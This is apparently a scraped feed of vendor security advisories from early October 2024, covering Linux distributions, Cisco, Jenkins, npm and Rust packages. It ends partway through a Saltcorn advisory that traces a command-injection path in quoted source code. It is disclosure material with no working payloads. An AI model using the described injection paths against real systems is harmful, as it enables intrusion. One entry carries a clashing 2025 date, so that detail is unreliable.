01.10.2024 18:02:17	suse	[SUSE-SU-2024:3507-1] Security update for MozillaThunderbird (important)	Security update for MozillaThunderbird	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3507-1
01.10.2024 17:47:15	ubuntu	[USN-7050-1] Devise-Two-Factor vulnerabilities	Several security issues were fixed in Devise-Two-Factor.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7050-1
01.10.2024 17:43:31	suse	[SUSE-SU-2024:3505-1] Security update for OpenIPMI (moderate)	Security update for OpenIPMI	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3505-1
01.10.2024 17:03:50	suse	[SUSE-SU-2024:3502-1] Security update for openvpn (moderate)	Security update for openvpn	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3502-1
01.10.2024 17:03:35	suse	[SUSE-SU-2024:3501-1] Security update for openssl-3 (important)	Security update for openssl-3	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3501-1
01.10.2024 16:54:08	ubuntu	[USN-7022-2] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7022-2
01.10.2024 16:46:20	ubuntu	[USN-7043-2] cups-filters vulnerability	cups-filters could be made to run programs if it received specially craftednetwork traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7043-2
01.10.2024 16:24:27	ubuntu	[USN-7049-1] PHP vulnerabilities	Several security issues were fixed in PHP.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7049-1
01.10.2024 16:21:56	ubuntu	[USN-7003-5] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7003-5
01.10.2024 15:25:03	ubuntu	[USN-7048-1] Vim vulnerability	Vim could be made to crash if it received specially crafted input.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7048-1
01.10.2024 14:15:31	ubuntu	[USN-7041-2] CUPS vulnerability	CUPS could be made to crash or run programs if it received speciallycrafted network traffic.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7041-2
01.10.2024 14:11:43	ubuntu	[USN-6964-2] ORC vulnerability	ORC could be made to crash or execute arbitrary code	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-6964-2
01.10.2024 21:10:51	npm	[NPM:GHSA-34Q8-JCQ6-MC37] uPlot Prototype Pollution vulnerability (high)	Versions of the package uplot before 1.6.31 are vulnerable to Prototype Pollution via the uplot.assign function due to missing check if the attribute resolves to the object prototype.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-34Q8-JCQ6-MC37
01.10.2024 21:10:29	npm	[NPM:GHSA-QWRQ-VXVW-537R] git-shallow-clone OS Command Injection vulnerability (moderate)	All versions of the package git-shallow-clone are vulnerable to Command injection due to missing sanitization or mitigation flags in the process variable of the gitShallowClone function.	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-QWRQ-VXVW-537R
01.10.2024 23:43:37	rustsec	[RUSTSEC-2024-0376] Remotely exploitable Denial of Service in Tonic	## ImpactWhen using `tonic::transport::Server` there is a remote DoS attack that can cause the server to exit cleanly on accepting a tcp/tls stream. This can be triggered via causing the accept call to error out with errors there were not covered correctly causing the accept loop to exit. More information can be found [here](https://github.com/hyperium/tonic/issues/1897)## PatchesUpgrading to tonic `0.12.3` and above contains the fix. ## WorkaroundsA custom accept loop is a possible workaround.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0376
01.10.2024 16:26:04	almalinux	[ALSA-2024:7349] grafana security update (moderate)	grafana security update	https://secdb.nttzen.cloud/security-advisory/almalinux/ALSA-2024:7349
02.10.2024 00:22:35	pypi	[PYSEC-2024-99] openslides vulnerability	OpenSlides 4.0.15 was discovered to be using a weak hashing algorithm to store passwords.	https://secdb.nttzen.cloud/security-advisory/pypi/PYSEC-2024-99
03.10.2024 13:48:38	ubuntu	[USN-7021-4] Linux kernel vulnerabilities	Several security issues were fixed in the Linux kernel.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7021-4
03.10.2024 08:14:22	ubuntu	[USN-7052-1] GNOME Shell vulnerabilities	Several security issues were fixed in GNOME Shell.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7052-1
03.10.2024 04:58:14	fedora	[FEDORA-2024-5f39927e90] Fedora 40: firefox	New upstream builds (131.0)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-5f39927e90
03.10.2024 00:41:53	npm	[NPM:GHSA-4XQV-47RM-37MM] OpenC3 stores passwords in clear text (`GHSL-2024-129`) (moderate)	### SummaryOpenC3 COSMOS stores the password of a user unencrypted in the LocalStorage of a web browser. This makes the user password susceptible to exfiltration via Cross-site scripting (see GHSL-2024-128).Note: This CVE only affects Open Source edition, and not OpenC3 COSMOS Enterprise Edition### ImpactThis issue may lead to Information Disclosure.NOTE: The complete advisory with much more information is added as [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-4xqv-47rm-37mm#advisory-comment-104905).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-4XQV-47RM-37MM
03.10.2024 00:41:43	npm	[NPM:GHSA-VFJ8-5PJ7-2F9G] OpenC3 Cross-site Scripting in Login functionality (`GHSL-2024-128`) (moderate)	### SummaryThe login functionality contains a reflected cross-site scripting (XSS) vulnerability.Note: This CVE only affects Open Source Edition, and not OpenC3 COSMOS Enterprise Edition### ImpactThis issue may lead up to Remote Code Execution (RCE).NOTE: The complete advisory with much more information is added as [comment](https://github.com/OpenC3/cosmos/security/advisories/GHSA-vfj8-5pj7-2f9g#advisory-comment-104904).	https://secdb.nttzen.cloud/security-advisory/npm/NPM:GHSA-VFJ8-5PJ7-2F9G
03.10.2024 00:51:03	maven	[MAVEN:GHSA-8PJW-FFF6-3MJV] Jenkins OpenId Connect Authentication Plugin lacks issuer claim validation (critical)	Jenkins OpenId Connect Authentication Plugin 4.354.v321ce67a_1de8 and earlier does not check the `iss` (Issuer) claim of an ID Token during its authentication flow, a value that identifies the Originating Party (IdP).This vulnerability may allow attackers to subvert the authentication flow, potentially gaining administrator access to Jenkins.OpenId Connect Authentication Plugin 4.355.v3a_fb_fca_b_96d4 checks the `iss` (Issuer) claim of an ID Token during its authentication flow when the Issuer is known.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-8PJW-FFF6-3MJV
03.10.2024 00:50:54	maven	[MAVEN:GHSA-49HX-9MM2-7675] Jenkins OpenId Connect Authentication Plugin lacks audience claim validation (critical)	Jenkins OpenId Connect Authentication Plugin 4.354.v321ce67a_1de8 and earlier does not check the `aud` (Audience) claim of an ID Token during its authentication flow, a value to verify the token is issued for the correct client.This vulnerability may allow attackers to subvert the authentication flow, potentially gaining administrator access to Jenkins.OpenId Connect Authentication Plugin 4.355.v3a_fb_fca_b_96d4 checks the `aud` (Audience) claim of an ID Token during its authentication flow.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-49HX-9MM2-7675
03.10.2024 00:50:29	maven	[MAVEN:GHSA-PJ95-PH4Q-4QM4] Jenkins exposes multi-line secrets through error messages (moderate)	Jenkins Jenkins provides the `secretTextarea` form field for multi-line secrets.Jenkins 2.478 and earlier, LTS 2.462.2 and earlier does not redact multi-line secret values in error messages generated for form submissions involving the `secretTextarea` form field.This can result in exposure of multi-line secrets through those error messages, e.g., in the system log.Jenkins 2.479, LTS 2.462.3 redacts multi-line secret values in error messages generated for form submissions involving the `secretTextarea` form field.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-PJ95-PH4Q-4QM4
03.10.2024 00:50:49	maven	[MAVEN:GHSA-62JV-J4W7-5HH8] Jenkins Credentials plugin reveals encrypted values of credentials to users with Extended Read permission (moderate)	Jenkins Credentials Plugin 1380.va_435002fa_924 and earlier, except 1371.1373.v4eb_fa_b_7161e9, does not redact encrypted values of credentials using the `SecretBytes` type (e.g., Certificate credentials, or Secret file credentials from Plain Credentials Plugin) when accessing item `config.xml` via REST API or CLI.This allows attackers with Item/Extended Read permission to view encrypted `SecretBytes` values in credentials.This issue is similar to SECURITY-266 in the 2016-05-11 security advisory, which applied to the `Secret` type used for inline secrets and some credentials types.Credentials Plugin 1381.v2c3a_12074da_b_ redacts the encrypted values of credentials using the `SecretBytes` type in item `config.xml` files.This fix is only effective on Jenkins 2.479 and newer, LTS 2.462.3 and newer. While Credentials Plugin 1381.v2c3a_12074da_b_ can be installed on Jenkins 2.463 through 2.478 (both inclusive), encrypted values of credentials using the `SecretBytes` type will not be redacted when accessing item `config.xml` via REST API or CLI.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-62JV-J4W7-5HH8
03.10.2024 00:50:44	maven	[MAVEN:GHSA-F9QJ-77Q2-H5C5] Jenkins item creation restriction bypass vulnerability (moderate)	Jenkins provides APIs for fine-grained control of item creation:- Authorization strategies can prohibit the creation of items of a given type in a given item group (`ACL#hasCreatePermission2`).- Item types can prohibit creation of new instances in a given item group (`TopLevelItemDescriptor#isApplicableIn(ItemGroup)`).If an attempt is made to create an item of a prohibited type through the Jenkins CLI or the REST API and either of the above checks fail, Jenkins 2.478 and earlier, LTS 2.462.2 and earlier creates the item in memory, only deleting it from disk.This allows attackers with Item/Create permission to bypass these restrictions, creating a temporary item. With Item/Configure permission, they can also save the item to persist it.If an attempt is made to create an item of a prohibited type through the Jenkins CLI or the REST API and either of the above checks fail, Jenkins 2.479, LTS 2.462.3 does not retain the item in memory.	https://secdb.nttzen.cloud/security-advisory/maven/MAVEN:GHSA-F9QJ-77Q2-H5C5
02.10.2024 19:00:00	cisco	[CISCO-SA-NDHS-UAAPI-JH4V6ZPN] Cisco Nexus Dashboard and Nexus Dashboard Fabric Controller Unauthorized REST API Vulnerabilities (medium)	Multiple vulnerabilities in the REST APIs of Cisco Nexus Dashboard and Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, low-privileged, remote attacker to perform a limited set of network-admin functions on an affected device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDHS-UAAPI-JH4V6ZPN
02.10.2024 19:00:00	cisco	[CISCO-SA-NDHS-IDV-BK8VQEDC] Cisco Nexus Dashboard Hosted Services Information Disclosure Vulnerabilities (medium)	Multiple vulnerabilities in the logging functions of Cisco Nexus Dashboard Fabric Controller (NDFC), Cisco Nexus Dashboard Insights, and Cisco Nexus Dashboard Orchestrator (NDO) could allow an attacker with access to a tech support file to view sensitive information.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDHS-IDV-BK8VQEDC
02.10.2024 19:00:00	cisco	[CISCO-SA-SB-RV04X_RV32X_VULNS-YJ2OSDHV] Cisco Small Business RV042, RV042G, RV320, and RV325 Routers Denial of Service and Remote Code Execution Vulnerabilities (medium)	Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV042, RV042G, RV320, and RV325 Routers could allow a remote attacker to execute arbitrary commands on the underlying operating system of an affected device or cause a denial of service (DoS) condition.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has not released and will not release software updates that address these vulnerabilities because the affected products are past their respective dates for End of Software Maintenance Releases. The Cisco Product Security Incident Response Team (PSIRT) will continue to evaluate and disclose security vulnerabilities that affect these products until they reach their respective Last Dates of Support.There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-SB-RV04X_RV32X_VULNS-YJ2OSDHV
02.10.2024 19:00:00	cisco	[CISCO-SA-RV34X-PRIVESC-RCE-QE33TCMS] Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers Privilege Escalation and Remote Command Execution Vulnerabilities (high)	Multiple vulnerabilities in the web-based management interface of Cisco Small Business RV340, RV340W, RV345, and RV345P Dual WAN Gigabit VPN Routers could allow an authenticated, remote attacker to elevate privileges and execute arbitrary commands on the underlying operating system of an affected device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco has not released and will not release software updates that address these vulnerabilities because the affected products are past their respective dates for End of Software Maintenance Releases. The Cisco Product Security Incident Response Team (PSIRT) will continue to evaluate and disclose security vulnerabilities that affect these products until they reach their respective Last Dates of Support.There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-RV34X-PRIVESC-RCE-QE33TCMS
02.10.2024 19:00:00	cisco	[CISCO-SA-NDO-TLSVLD-FDUF3CPW] Cisco Nexus Dashboard Orchestrator SSL/TLS Certificate Validation Vulnerability (medium)	A vulnerability in the SSL/TLS implementation of Cisco Nexus Dashboard Orchestrator (NDO) could allow an unauthenticated, remote attacker to intercept sensitive information from an affected device.This vulnerability exists because the Cisco NDO Validate Peer Certificate site management feature validates the certificates for Cisco Application Policy Infrastructure Controller (APIC), Cisco Cloud Network Controller (CNC), and Cisco Nexus Dashboard only when a new site is added or an existing one is reregistered. An attacker could exploit this vulnerability by using machine-in-the-middle techniques to intercept the traffic between the affected device and Cisco NDO and then using a crafted certificate to impersonate the affected device. A successful exploit could allow the attacker to learn sensitive information during communications between these devices.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDO-TLSVLD-FDUF3CPW
02.10.2024 19:00:00	cisco	[CISCO-SA-NDFC-RACI-T46K3JNN] Cisco Nexus Dashboard Fabric Controller REST API Command Injection Vulnerability (medium)	A vulnerability in Cisco Nexus Dashboard Fabric Controller (NDFC), formerly Cisco Data Center Network Manager (DCNM), could allow an authenticated, remote attacker with network-admin privileges to perform a command injection attack against an affected device.This vulnerability is due to insufficient validation of command arguments. An attacker could exploit this vulnerability by submitting crafted command arguments to a specific REST API endpoint. A successful exploit could allow the attacker to overwrite sensitive files or crash a specific container, which would restart on its own, causing a low-impact denial of service (DoS) condition.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-RACI-T46K3JNN
02.10.2024 19:00:00	cisco	[CISCO-SA-NDFC-PTRCE-BUSHLBP] Cisco Nexus Dashboard Fabric Controller Remote Code Execution Vulnerability (high)	A vulnerability in Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, remote attacker with low privileges to execute arbitrary code on an affected device.This vulnerability is due to improper path validation. An attacker could exploit this vulnerability by using the Secure Copy Protocol (SCP) to upload malicious code to an affected device using path traversal techniques. A successful exploit could allow the attacker to execute arbitrary code in a specific container with the privileges of root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-PTRCE-BUSHLBP
02.10.2024 19:00:00	cisco	[CISCO-SA-NDFC-CMDINJ-UVYZRKFR] Cisco Nexus Dashboard Fabric Controller Arbitrary Command Execution Vulnerability (critical)	A vulnerability in the REST API and web UI of Cisco Nexus Dashboard Fabric Controller (NDFC) could allow an authenticated, low-privileged, remote attacker to perform a command injection attack against an affected device.This vulnerability is due to improper user authorization and insufficient validation of command arguments. An attacker could exploit this vulnerability by submitting crafted commands to an affected REST API endpoint or through the web UI. A successful exploit could allow the attacker to execute arbitrary commands on the CLI of a Cisco NDFC-managed device with network-admin privileges.Note: This vulnerability does not affect Cisco NDFC when it is configured for storage area network (SAN) controller deployment.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-CMDINJ-UVYZRKFR
02.10.2024 19:00:00	cisco	[CISCO-SA-NDFC-CIDV-XVYX2WLJ] Cisco Nexus Dashboard Fabric Controller Configuration Backup Information Disclosure Vulnerability (medium)	A vulnerability in the Cisco Nexus Dashboard Fabric Controller (NDFC) software, formerly Cisco Data Center Network Manager (DCNM), could allow an attacker with access to a backup file to view sensitive information.This vulnerability is due to the improper storage of sensitive information within config only and full backup files. An attacker could exploit this vulnerability by parsing the contents of a backup file that is generated from an affected device. A successful exploit could allow the attacker to access sensitive information, including NDFC-connected device credentials, the NDFC site manager private key, and the scheduled backup file encryption key.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-NDFC-CIDV-XVYX2WLJ
02.10.2024 19:00:00	cisco	[CISCO-SA-MERAKI-MX-VPN-DOS-BY-QWUKQV7X] Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Session Takeover and Denial of Service Vulnerability (medium)	A vulnerability in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to hijack an AnyConnect VPN session or cause a denial of service (DoS) condition for individual users of the AnyConnect VPN service on an affected device.This vulnerability is due to weak entropy for handlers that are used during the VPN authentication process as well as a race condition that exists in the same process. An attacker could exploit this vulnerability by correctly guessing an authentication handler and then sending crafted HTTPS requests to an affected device. A successful exploit could allow the attacker to take over the AnyConnect VPN session from a target user or prevent the target user from establishing an AnyConnect VPN session with the affected device.Cisco Meraki has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-MERAKI-MX-VPN-DOS-BY-QWUKQV7X
02.10.2024 19:00:00	cisco	[CISCO-SA-MERAKI-MX-VPN-DOS-QTRHZG2] Cisco Meraki MX and Z Series Teleworker Gateway AnyConnect VPN Denial of Service Vulnerabilities (high)	Multiple vulnerabilities in the Cisco AnyConnect VPN server of Cisco Meraki MX and Cisco Meraki Z Series Teleworker Gateway devices could allow an unauthenticated, remote attacker to cause a denial of service (DoS) condition to the AnyConnect VPN service on an affected device.For more information about these vulnerabilities, see the Details ["#details"] section of this advisory.Cisco Meraki has released software updates that address these vulnerabilities. There are no workarounds that address these vulnerabilities.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-MERAKI-MX-VPN-DOS-QTRHZG2
02.10.2024 19:00:00	cisco	[CISCO-SA-ISE-INFO-DISC-ZYF2NEEX] Cisco Identity Services Engine Information Disclosure Vulnerability (medium)	A vulnerability in the web-based management interface of Cisco Identity Services Engine (ISE) could allow an authenticated, remote attacker to obtain sensitive information from an affected device.This vulnerability is due to a lack of proper data protection mechanisms for certain configuration settings. An attacker with Read-Only Administrator privileges could exploit this vulnerability by browsing to a page that contains sensitive data. A successful exploit could allow the attacker to view device credentials that are normally not visible to Read-Only Administrators.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-ISE-INFO-DISC-ZYF2NEEX
02.10.2024 19:00:00	cisco	[CISCO-SA-EXPW-ESCALATION-3BKZ77BD] Cisco Expressway Series Privilege Escalation Vulnerability (medium)	A vulnerability in the restricted shell of Cisco Expressway Series could allow an authenticated, local attacker to perform command injection attacks on the underlying operating system and elevate privileges to root. To exploit this vulnerability, the attacker must have Administrator-level credentials with read-write privileges on an affected device.This vulnerability is due to insufficient validation of user-supplied input. An attacker could exploit this vulnerability by submitting a series of crafted CLI commands. A successful exploit could allow the attacker to escape the restricted shell and gain root privileges on the underlying operating system of the affected device.Note: Cisco Expressway Series refers to Cisco Expressway Control (Expressway-C) devices and Cisco Expressway Edge (Expressway-E) devices.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-EXPW-ESCALATION-3BKZ77BD
02.10.2024 19:00:00	cisco	[CISCO-SA-CIMC-REDFISH-COMINJ-SBKV5ZZ] Cisco UCS B-Series, Managed C-Series, and X-Series Servers Redfish API Command Injection Vulnerability (medium)	A vulnerability in the Redfish API of Cisco UCS B-Series, Cisco UCS Managed C-Series, and Cisco UCS X-Series Servers could allow an authenticated, remote attacker with administrative privileges to perform command injection attacks on an affected system and elevate privileges to root.This vulnerability is due to insufficient input validation. An attacker with administrative privileges could exploit this vulnerability by sending crafted commands through the Redfish API on an affected device. A successful exploit could allow the attacker to elevate privileges to root.Cisco has released software updates that address this vulnerability. There are no workarounds that address this vulnerability.	https://secdb.nttzen.cloud/security-advisory/cisco/CISCO-SA-CIMC-REDFISH-COMINJ-SBKV5ZZ
02.10.2024 18:11:47	suse	[SUSE-SU-2024:3158-2] Security update for postgresql16 (important)	Security update for postgresql16	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3158-2
02.10.2024 18:11:47	suse	[SUSE-SU-2024:3158-3] Security update for postgresql16 (important)	Security update for postgresql16	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3158-3
02.10.2024 18:03:41	suse	[SUSE-SU-2024:3459-1] Security update for kubernetes1.24 (important)	Security update for kubernetes1.24	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3459-1
02.10.2024 16:43:16	suse	[SUSE-SU-2024:3457-1] Security update for kubernetes1.25 (important)	Security update for kubernetes1.25	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3457-1
02.10.2024 16:40:24	suse	[SUSE-SU-2024:3456-1] Security update for kubernetes1.26 (important)	Security update for kubernetes1.26	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3456-1
02.10.2024 16:39:42	suse	[SUSE-SU-2024:3455-1] Security update for kubernetes1.27 (important)	Security update for kubernetes1.27	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3455-1
02.10.2024 16:38:56	suse	[SUSE-SU-2024:3454-1] Security update for kubernetes1.28 (important)	Security update for kubernetes1.28	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3454-1
02.10.2024 14:03:35	suse	[SUSE-SU-2024:3510-1] Security update for tomcat (important)	Security update for tomcat	https://secdb.nttzen.cloud/security-advisory/suse/SUSE-SU-2024:3510-1
02.10.2024 06:58:22	ubuntu	[USN-7051-1] AsyncSSH vulnerability	A protocol flaw was fixed in AsyncSSH.	https://secdb.nttzen.cloud/security-advisory/ubuntu/USN-7051-1
02.10.2024 05:59:01	fedora	[FEDORA-2024-2b429e720e] Fedora 40: php (critical)	PHP version 8.3.12 (26 Sep 2024)CGI:Fixed bug GHSA-p99j-rfp4-xqvq (Bypass of CVE-2024-4577, Parameter InjectionVulnerability). (CVE-2024-8926) (nielsdos)Fixed bug GHSA-94p6-54jq-9mwp (cgi.force_redirect configuration is bypassabledue to the environment variable collision). (CVE-2024-8927) (nielsdos)Core:Fixed bug GH-15408 (MSan false-positve on zend_max_execution_timer). (zeriyoshi)Fixed bug GH-15515 (Configure error grep illegal option q). (Peter Kokot)Fixed bug GH-15514 (Configure error: genif.sh: syntax error). (Peter Kokot)Fixed bug GH-15565 (--disable-ipv6 during compilation produces error EAI_SYSTEMnot found). (nielsdos)Fixed bug GH-15587 (CRC32 API build error on arm 32-bit). (Bernd Kuhls, ThomasPetazzoni)Fixed bug GH-15330 (Do not scan generator frames more than once). (Arnaud)Fixed uninitialized lineno in constant AST of internal enums. (ilutov)Curl:FIxed bug GH-15547 (curl_multi_select overflow on timeout argument). (DavidCarlier)DOM:Fixed bug GH-15551 (Segmentation fault (access null pointer) inext/dom/xml_common.h). (nielsdos)Fixed bug GH-15654 (Signed integer overflow in ext/dom/nodelist.c). (nielsdos)Fileinfo:Fixed bug GH-15752 (Incorrect error message for finfo_file with an emptyfilename argument). (DanielEScherzer)FPM:Fixed bug GHSA-865w-9rf3-2wh5 (Logs from childrens may be altered).(CVE-2024-9026) (Jakub Zelenka)MySQLnd:Fixed bug GH-15432 (Heap corruption when querying a vector). (cmb, KamilTekiela)Opcache:Fixed bug GH-15661 (Access null pointer in Zend/Optimizer/zend_inference.c).(nielsdos)Fixed bug GH-15658 (Segmentation fault in Zend/zend_vm_execute.h). (nielsdos)SAPI:Fixed bug GHSA-9pqp-7h25-4f32 (Erroneous parsing of multipart form data).(CVE-2024-8925) (Arnaud)Standard:Fixed bug GH-15552 (Signed integer overflow in ext/standard/scanf.c). (cmb)Streams:Fixed bug GH-15628 (php_stream_memory_get_buffer() not zero-terminated). (cmb)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-2b429e720e
03.10.2024 03:06:54	rubysec	[RUBYSEC:DECIDIM-2024-41673] Decidim has a cross-site scripting vulnerability in the version control page (high)	### ImpactThe version control feature used in resources is subject to potentialcross-site scripting (XSS) attack through a malformed URL.### WorkaroundsNot available### ReferencesOWASP ASVS v4.0.3-5.1.3### CreditsThis issue was discovered in a security audit organized by[Open Source Politics](https://opensourcepolitics.eu/)against Decidim done during July 2025.	https://secdb.nttzen.cloud/security-advisory/rubysec/RUBYSEC:DECIDIM-2024-41673
02.10.2024 17:58:53	rustsec	[RUSTSEC-2024-0376] Remotely exploitable Denial of Service in Tonic	## ImpactWhen using `tonic::transport::Server` there is a remote DoS attack that can cause the server to exit cleanly on accepting a tcp/tls stream. This can be triggered via causing the accept call to error out with errors there were not covered correctly causing the accept loop to exit. More information can be found [here](https://github.com/hyperium/tonic/issues/1897)## PatchesUpgrading to tonic `0.12.3` and above contains the fix. ## WorkaroundsA custom accept loop is a possible workaround.	https://secdb.nttzen.cloud/security-advisory/rustsec/RUSTSEC-2024-0376
04.10.2024 04:51:12	fedora	[FEDORA-2024-7c800c4df7] Fedora 39: php (critical)	PHP version 8.2.24 (26 Sep 2024)CGI:Fixed bug GHSA-p99j-rfp4-xqvq (Bypass of CVE-2024-4577, Parameter InjectionVulnerability). (CVE-2024-8926) (nielsdos)Fixed bug GHSA-94p6-54jq-9mwp (cgi.force_redirect configuration is bypassabledue to the environment variable collision). (CVE-2024-8927) (nielsdos)Core:Fixed bug GH-15408 (MSan false-positve on zend_max_execution_timer). (zeriyoshi)Fixed bug GH-15515 (Configure error grep illegal option q). (Peter Kokot)Fixed bug GH-15514 (Configure error: genif.sh: syntax error). (Peter Kokot)Fixed bug GH-15565 (--disable-ipv6 during compilation produces error EAI_SYSTEMnot found). (nielsdos)Fixed bug GH-15587 (CRC32 API build error on arm 32-bit). (Bernd Kuhls, ThomasPetazzoni)Fixed bug GH-15330 (Do not scan generator frames more than once). (Arnaud)Fixed uninitialized lineno in constant AST of internal enums. (ilutov)Curl:FIxed bug GH-15547 (curl_multi_select overflow on timeout argument). (DavidCarlier)DOM:Fixed bug GH-15551 (Segmentation fault (access null pointer) inext/dom/xml_common.h). (nielsdos)Fileinfo:Fixed bug GH-15752 (Incorrect error message for finfo_file with an emptyfilename argument). (DanielEScherzer)FPM:Fixed bug GHSA-865w-9rf3-2wh5 (Logs from childrens may be altered).(CVE-2024-9026) (Jakub Zelenka)MySQLnd:Fixed bug GH-15432 (Heap corruption when querying a vector). (cmb, KamilTekiela)Opcache:Fixed bug GH-15661 (Access null pointer in Zend/Optimizer/zend_inference.c).(nielsdos)Fixed bug GH-15658 (Segmentation fault in Zend/zend_vm_execute.h). (nielsdos)SAPI:Fixed bug GHSA-9pqp-7h25-4f32 (Erroneous parsing of multipart form data).(CVE-2024-8925) (Arnaud)SOAP:Fixed bug php#73182 (PHP SOAPClient does not support stream context HTTP headersin array form). (nielsdos)Standard:Fixed bug GH-15552 (Signed integer overflow in ext/standard/scanf.c). (cmb)Streams:Fixed bug GH-15628 (php_stream_memory_get_buffer() not zero-terminated). (cmb)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-7c800c4df7
04.10.2024 04:47:10	fedora	[FEDORA-2024-126d22c121] Fedora 40: pgadmin4 (critical)	Fix CVE-2024-9014.	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-126d22c121
04.10.2024 03:17:02	fedora	[FEDORA-2024-1d8785c391] Fedora 41: firefox	New upstream builds (131.0)	https://secdb.nttzen.cloud/security-advisory/fedora/FEDORA-2024-1d8785c391
04.10.2024 01:21:26	npm	[NPM:GHSA-FM76-W8JW-XF8M] @saltcorn/plugins-loader unsanitized plugin name leads to a remote code execution (RCE) vulnerability when creating plugins using git source (high)	### SummaryWhen creating a new plugin using the `git` source, the user-controlled value `req.body.name` is used to build the plugin directory where the location will be cloned. The API used to execute the `git clone` command with the user-controlled data is `child_process.execSync`. Since the user-controlled data is not validated, a user with admin permission can add escaping characters and execute arbitrary commands, leading to a command injection vulnerability.### DetailsRelevant code from source (`req.body`) to sink (`child_process.execSync`).- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/routes/plugins.js#L1400```jsrouter.post( "/", isAdmin, error_catcher(async (req, res) => { const plugin = new Plugin(req.body); // [1] [...] try { await load_plugins.loadAndSaveNewPlugin( // [3] plugin, schema === db.connectObj.default_schema \|\| plugin.source === "github" ); [...] } }));```- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/saltcorn-data/models/plugin.ts#L44```jsclass Plugin { [...] constructor(o: PluginCfg \| PluginPack \| Plugin) { [...] this.name = o.name; // [2] [...]}```- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/server/load_plugins.js#L64-L65```jsconst loadAndSaveNewPlugin = async (plugin, force, noSignalOrDB) => { [...] const loader = new PluginInstaller(plugin); // [4] const res = await loader.install(force); // [7] [...]};```- file: https://github.com/saltcorn/saltcorn/blob/v1.0.0-beta.13/packages/plugins-loader/plugin_installer.js#L41-L61```jsclass PluginInstaller { constructor(plugin, opts = {}) { [...] const tokens = plugin.source === "npm" ? plugin.location.split("/") : plugin.name.split("/"); // [5] [...] this.tempDir = join(this.tempRootFolder, "temp_install", ...tokens); // [6] [...] } async install(force) { [...] 